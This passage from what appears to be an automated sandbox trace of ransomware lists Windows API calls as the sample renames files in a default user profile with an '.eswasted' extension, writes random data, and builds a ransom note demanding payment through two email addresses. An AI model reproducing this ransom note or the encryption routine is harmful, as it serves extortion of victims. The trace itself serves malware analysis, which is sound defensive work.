(HeapHandle=0x4a0000, Flags=0x0, Size=0x27e) returned 0x4d91a8 [0082.917] lstrcpyW (in: lpString1=0x4d921c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.917] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.917] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.918] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.918] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.918] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.919] SetEndOfFile (hFile=0x118) returned 1 [0082.919] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.919] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.920] lstrcpyW (in: lpString1=0x4d921c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.920] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.eswasted" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.eswasted")) returned 1 [0082.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.eswasted" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.921] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0082.921] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xe2 [0082.921] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe2) returned 0x2d0000 [0082.921] CloseHandle (hObject=0xf8) returned 1 [0082.922] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.922] CloseHandle (hObject=0x120) returned 1 [0082.922] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de250 [0082.922] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.923] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de298 | out: pbBuffer=0x4de298) returned 1 [0082.923] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.923] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.924] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.924] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de458 [0082.932] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de250 | out: hHeap=0x4a0000) returned 1 [0082.932] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.932] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]h1l5QKG6gLFml54NZLRc/6We7zdWOmzUDivIu7hj+heSzD6fykyKmPAs0qaM0o6j\r\nYoNAjFiPXxJmus9+Mn3lfy+t/hvdF6aSU17ZNHl9rm0EOkUc3rz9zeT1e7Eojajx\r\nOTjJvg8hg0PLknF+RlfNrbupu5yuMViDmgIKGl4ZqAZMpJQyM5wSthAv/g10QOZ6\r\nBYRAs+U3YXtXiUSNHeJKYASgDIOm5YV3JxeYJ+BZt2D7ulzZvZjtXRr6HvjfHbPj\r\nnsCEFcQNPqhlY6Z8sKbtBlJ3uTK+TThhELEst3gDqH0JnMoXoy14aExBUrwxTqiO\r\nPHYe6xLgetPDkXbMvF4Vt1rj+3op1zcVUPBLhO/k+t4gTYqw1IWvzDoxyUHaUVor\r\nFG8EIPktxuCMdN8En5ETyyFXSSoVkcFxz09QuGShn4pjn2j4q6dlZ78RUGMGT94d\r\nyGybJFtj4gRj5nDOncJ33Y7TGOU8LGsVuCBBuIVtmrkmIUSIkLFq7r+77ZR6BBNX\r\nbHONHeBny2ljZa6V+HbzPcfk5y5C6tD/zOXG7x0hDebXW38/UPJAhT+qXNYTOrP8\r\nyTCjMPeExAA+CsGx5uiPSxMhh9KtLO+DYSp1vI8/NeQnaEDqAh0c4PZrhrMP5TGl\r\nBj6CQ91JYOkLVksTHlsMTzvAupaaMB35vC83LS2rbRG=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.932] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de458 | out: hHeap=0x4a0000) returned 1 [0082.932] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.933] SetEndOfFile (hFile=0x118) returned 1 [0082.935] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.935] CloseHandle (hObject=0x118) returned 1 [0082.936] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.936] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4908 | out: hHeap=0x4a0000) returned 1 [0082.936] _aulldvrm () returned 0x0 [0082.936] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.937] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.937] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.937] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0082.937] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4d91a8 [0082.937] lstrcpyW (in: lpString1=0x4d9230, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.937] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.937] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.938] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.938] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.940] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.941] SetEndOfFile (hFile=0x118) returned 1 [0082.941] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.941] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.941] lstrcpyW (in: lpString1=0x4d9230, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.eswasted")) returned 1 [0082.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0082.946] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.946] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x85 [0082.946] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0082.946] CloseHandle (hObject=0x120) returned 1 [0082.947] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.947] CloseHandle (hObject=0xf8) returned 1 [0082.947] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de250 [0082.948] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.948] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de298 | out: pbBuffer=0x4de298) returned 1 [0082.948] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.948] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.949] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.949] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.957] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de458 [0082.957] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de250 | out: hHeap=0x4a0000) returned 1 [0082.957] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.957] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]bvz1MJzfxrRnLLBz86Dq7pkF/gax5xj0R6OOZ1aS0lIejF2NcCdcEp2g2RsowcWl\r\nSLMl/lhosEhSzWJ6n4RQQEdxeXcd/NxxOz3pNjyxR8Sy9I0C4Y4GSSNUkt852CIb\r\n0IyJ2kAsCz83GmfLK1CeUdvclQh+9aIfBVehJuw3SnJiVE1SxhCnw2XOwQyCNBG6\r\n6Iclp8DtKFMyMie2cXVuttjFgGSRzF4dOBreJdHSNqd+MvRoAWhYVMkOxN/WnbRg\r\nOjgNrUDyGtVtDAFQeq12Arr5qMtxFjk2VZPi/XG5yilVkOdTvxUTRT9C9Rz7CqUi\r\nUtogkrqYFG5LW+LsEQQqDvt35TLVLfpBDIZiFw82iHBQxEQ8uPfsM52IqH4+mqta\r\nQ9TiIcJyJpo6GcvfCrQ+mOKnJ4IXp1ZTsvEGKEZOkznvZePL+MoyFtqTWPDuq32/\r\nMR89bx/yYNIBky7olGNOAlE6X/G0n73w4sNYnKynUbjgsFF//kBwHxvJtxvK3GPW\r\nkk3YlqvNqaFhr1nHrdS3+lgcz90UksicNka+efYZLRP9iDkzrjJehywKfzVtvWIS\r\nWM9Eug8LV5pPsUB6L4YmWfJ2t4OJ2vAS5RGDQDUJKDyqBBmFihwvzdVHu0vkaTor\r\nh0OhHWAzEisNVAzGDBkJc6B33Hnt2ifQUXLBHY5jZXB=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.957] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de458 | out: hHeap=0x4a0000) returned 1 [0082.957] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.958] SetEndOfFile (hFile=0x118) returned 1 [0082.960] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.960] CloseHandle (hObject=0x118) returned 1 [0082.961] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.962] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5005a0 | out: hHeap=0x4a0000) returned 1 [0082.962] _aulldvrm () returned 0x0 [0082.962] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.962] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.962] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.962] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0082.962] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a6) returned 0x4d91a8 [0082.963] lstrcpyW (in: lpString1=0x4d9244, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.963] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.963] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.963] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.963] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.964] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.965] SetEndOfFile (hFile=0x118) returned 1 [0082.965] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.965] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.965] lstrcpyW (in: lpString1=0x4d9244, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.965] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted")) returned 1 [0082.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0082.972] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0082.973] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x85 [0082.973] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0082.973] CloseHandle (hObject=0xf8) returned 1 [0082.976] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.976] CloseHandle (hObject=0x120) returned 1 [0082.977] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de250 [0082.977] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.978] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de298 | out: pbBuffer=0x4de298) returned 1 [0082.978] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.978] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.979] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.979] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.987] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de458 [0082.987] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de250 | out: hHeap=0x4a0000) returned 1 [0082.987] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.987] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]QoCYetgNngyeQ/cBXZ++Mja+inCo4os9E1EoPxl/9/nSZNsAsiCrXmkYdRbntMo8\r\nj86ugyd/zn2SJLcnxyFklXOuv5cDtS4sAtYzif9nDGyCTDBNel5PGMo1caP0zDhP\r\nIo6kroIy0K5l4lRw0LU9UXZ+zIepc9uSHbtup7ZwRqkQPWaEm0ikSHQKnZMgqugJ\r\nMAFesIVU3YDracAGUlBXqbmSbbH7meW69F6q/MMvIaK1zx/kmpMPSbNLVosqpB40\r\nhRkJEQpMsENeEYwrHcIjm19SFKF6XQFA7YaSh6P4eV1glFpPJQlkJ5DWYV7qQl/4\r\n61ZFi9lZavGyyaxJOhGBAZtJGIwtIZPRX7wXIOs7HztZ/68o/2AZMilWXj0M/5UU\r\nO+vjkuMsI/+r4jUN5gd6fXfAfIAsU0sYDoGzgHfdMGPxnI3dWpP+c7zWq2Mrf4Hf\r\nhnhiohw6ZiHvB7orE3qlyns6CnIc0egjD0mb6uCRVnFUmtn8qMLYkopCZfilcHpn\r\n5T/MWRZGNdAvxQGPTNYYBUSS3a/gVA/AEIxVCxPBH9IVuB5vl1fdaWlYEEjzHBCQ\r\nK7SAW+VfGnQDG0uPHWuF7te0BgVqFaV4adaFZ2x6e5Ljsc7uBkeaIKiGIIzHX4Vh\r\nJxxk9KQkEj65RkPZ5b8RVO0zkUefrutD5hB/2L1P/gV=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.987] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de458 | out: hHeap=0x4a0000) returned 1 [0082.987] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.988] SetEndOfFile (hFile=0x118) returned 1 [0082.993] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.993] CloseHandle (hObject=0x118) returned 1 [0082.994] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.995] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e5df8 | out: hHeap=0x4a0000) returned 1 [0082.995] _aulldvrm () returned 0x0 [0082.995] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.996] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.996] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.996] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0082.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4d91a8 [0082.996] lstrcpyW (in: lpString1=0x4d9236, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.996] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.996] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.997] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.997] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.998] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.999] SetEndOfFile (hFile=0x118) returned 1 [0082.999] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.999] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.999] lstrcpyW (in: lpString1=0x4d9236, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.eswasted")) returned 1 [0083.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.017] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0083.017] GetFileSize (in: 